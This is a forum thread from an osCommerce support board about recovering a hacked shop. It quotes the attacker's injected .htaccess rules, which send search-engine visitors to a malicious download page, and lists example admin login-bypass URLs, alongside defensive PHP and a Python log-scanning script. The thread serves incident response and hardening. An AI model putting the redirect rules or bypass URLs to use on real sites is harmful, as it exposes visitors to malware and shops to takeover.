
osCommerce


Hacked: .htaccess changed


johnnybebad


Hi, one of my sites was hacked yesterday; I had an email today about it.

It appears that they have changed the .htaccess file to what's below; the link at the bottom takes you to one of those dodgy download sites saying you have a virus on your PC.

The question is, how do I find out where they got in and close the hole?

I have replaced the file and the site appears to be working normally, and I can't find any other issues.

Please can someone advise ASAP. Merry Christmas, folks.

 

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*g?oog?le\.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://frigo.info/hvac/temp.php [R,L]

 

Thanks

Getting better with mods but no programmer am I.


Johnny,

If your site has an admin/file_manager.php and/or an admin/define_languages.php file, it is open to hackers.

If your site still has the admin directory named admin, it is open to hackers.

If your site does not have the security fixes mentioned in these threads (Admin Security, Website Security), it is open to hackers.

If your site does not have the 5 'Must Have' security contributions, it is open to hackers.

If you have not located and removed the malicious code and anomalous files from the previous hack, it is STILL OPEN TO HACKERS.

Chris


Hi,

I have most if not all the security mods installed.

I have done some checking and it's possible they cross-scripted through http_error.php, which I highlighted before. I say this because it's a file that I have had corrected and thought I had updated on all the sites, but it appears that I had the unaltered file on this account.

However, I need to find out for sure where they got in so I can check.

File manager and define languages don't exist, and admin has a completely different name. The front of the shop was affected, not admin, as far as I can tell; admin appears to be unaffected.

I can retest the account data, not a problem, but I need to make sure that I have plugged the hole or whatever I do is pointless.

Note: my site is checked by McAfee; the software is updated and transferred to all my sites (or at least I think it is). All security holes I find out about are corrected as soon as possible, when I am alerted by a scan.

The question is, I need to find out where they got in so I can go back and check everything.

I cannot find any other altered files at the moment and I am doing what I can.

Thanks


The server logs contain a record of all site activity.

Not easy to look through, but if you know what file(s) were altered or the approximate time, it makes it easier.

In this case you do know at least one file that was changed.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >



I can narrow the time down to 24-48 hours... lol, maybe even closer. Where are the server logs kept? I will have a look.

 

Thanks


Only you or your host can answer that question.

You'll want to pay close attention to any log entry that contains POST.

A partial log entry from the site I manage:

xxx.xxx.xxx.xxx - - [26/Dec/2010:11:22:52 -0500] "POST /login.php?action=process HTTP/1.1"

If they hijacked a file or form, about the only way to overwrite something is with a POST.

See what files people have been POST-ing to.



I have been told it was brute forced from the subnet 217.23.10.0/24 and they have complained. If that was the case, I would have thought there would be more accounts hacked on the server.

 

Trying to get more info.


Hi,

I have accessed my logs, but they appear to be for the last 24 hours only and there are no POSTs; all attempts made within the last 24 hours are GETs. I would need to go further back to find the hack attempt.

I hope to hear more from the company that hosts my server, to find out how they came to their conclusion or whether they were generalising. Their explanation runs a bit thin with me, as brute forcing my passwords on FTP should be a little more difficult than just trying numbers and letters etc.

Running hack attempt scans now to see if my main site is okay, and if so then maybe I will try and set up an account for the other accounts and check them out.

 

Thanks


If you look at the date/time of one of the infected files, you can look at your logs for that date/time.

Don't forget, often the logs have a different time from the server time.

You can find the difference by logging on, accessing a few pages and looking in the log for the time. Then create a file and see the date/time.

Not much use if you have deleted all the infected files.

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.


Hi, I was hijacked by a brute force attempt on FTP details on Christmas Eve, not very festive.

Basically some of the accounts had default FTP accounts set up, which are the same as control panel access.

Now the default gives out x number of characters, which happen to be the first part of the domain name. So all they had to do was brute force many combinations of the password until they got the green light, and leave a little mess.

I have made sure all the accounts on the server are not so straightforward now, and the default FTP has been removed, i.e. the username can't be the first x characters of the domain name. I have also set up brute force protection so that large numbers of attempts at accessing the FTP with different passwords lock them out.

Lesson learned; thankfully they didn't make much of a mess, but to make sure I am redoing all accounts and re-installing their settings just to be safe.

Remember: don't get sloppy.

Thanks for everyone's help, merry crimbo and a happy new year, hacker free hopefully.


PS: it didn't show up as a hack risk before or afterwards, be warned.


If the admin application_top is not patched, then they would not even need to brute force anything. Since an attacker can easily upload files into a writeable folder, all they do is upload a shell script, which gives them the ability to read files at least. At which point they read the contents of the config file, where the database username and password (thanks to cPanel) are usually not that far from the FTP login or even the cPanel username and password.

Changing the admin folder name works OK as a workaround, unless some plugin gives the admin folder location away, and some of them do. For instance, using a smiley in the FCKeditor will give away the admin location.

 

examples:

/admin/administrators.php/login.php?action=new

/admin/categories.php/login.php?action=new

 

If your admin is unprotected by htaccess or not renamed then anyone with a web browser can use a URL made of those two in order to get straight into your admin area and do whatever they want.

 

Putting htaccess permissions on the admin folder is the next best place to start.

 

If your webhost does not allow .htaccess, then add this somewhere near the top of your application_top.php file in /admin/includes/:

if (stristr($_SERVER['REQUEST_URI'], '.php/login')) {
    die(); // do something, up to you what
}

This will put paid to attackers using requests that append the login.php file to admin files in order to circumvent admin permissions.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
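Two pieces of advice in this thread can be turned into one log check: the earlier post's tip to look for POST entries around the time the file changed, and this post's warning about URLs that append login.php to an admin script. The Python below is an added example, not code from the thread or from osCommerce; it parses constructed Apache combined-format log lines (addresses, times and sizes are made up) and reports POST targets inside a time window plus any request with the .php/login.php shape.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed Apache combined-format log lines (addresses, times and sizes are
# made up); the ".php/login.php" paths copy the shape described in the thread.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Dec/2010:02:11:07 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Dec/2010:02:11:09 -0500] "POST /login.php?action=process HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [24/Dec/2010:02:13:40 -0500] "GET /admin/categories.php/login.php?action=new HTTP/1.1" 200 8800 "-" "curl/7.21"
198.51.100.9 - - [24/Dec/2010:02:14:02 -0500] "POST /admin/administrators.php/login.php?action=new HTTP/1.1" 200 120 "-" "curl/7.21"
203.0.113.7 - - [26/Dec/2010:11:22:52 -0500] "POST /login.php?action=process HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

TS_FMT = "%d/%b/%Y:%H:%M:%S %z"  # Apache's default timestamp layout
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Request shape the post above warns about: an admin script with "/login.php"
# appended as PATH_INFO so the admin permission check is circumvented.
BYPASS_RE = re.compile(r"\.php/login\.php", re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def suspicious_requests(log_text, since, until):
    """POST counts by path and bypass-shaped hits for entries timestamped
    within [since, until]; both bounds are given in the log's own format."""
    lo, hi = (datetime.strptime(t, TS_FMT) for t in (since, until))
    posts, bypass = Counter(), []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not lo <= rec["ts"] <= hi:
            continue  # unparseable, or outside the window being examined
        if rec["method"] == "POST":
            posts[rec["path"].split("?", 1)[0]] += 1  # strip the query string
        if BYPASS_RE.search(rec["path"]):
            bypass.append((rec["ip"], rec["method"], rec["path"]))
    return posts, bypass
```

Run it over a real access log with the window narrowed to the modification time of the altered file, and remember the earlier note that log timestamps may be offset from the server clock.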
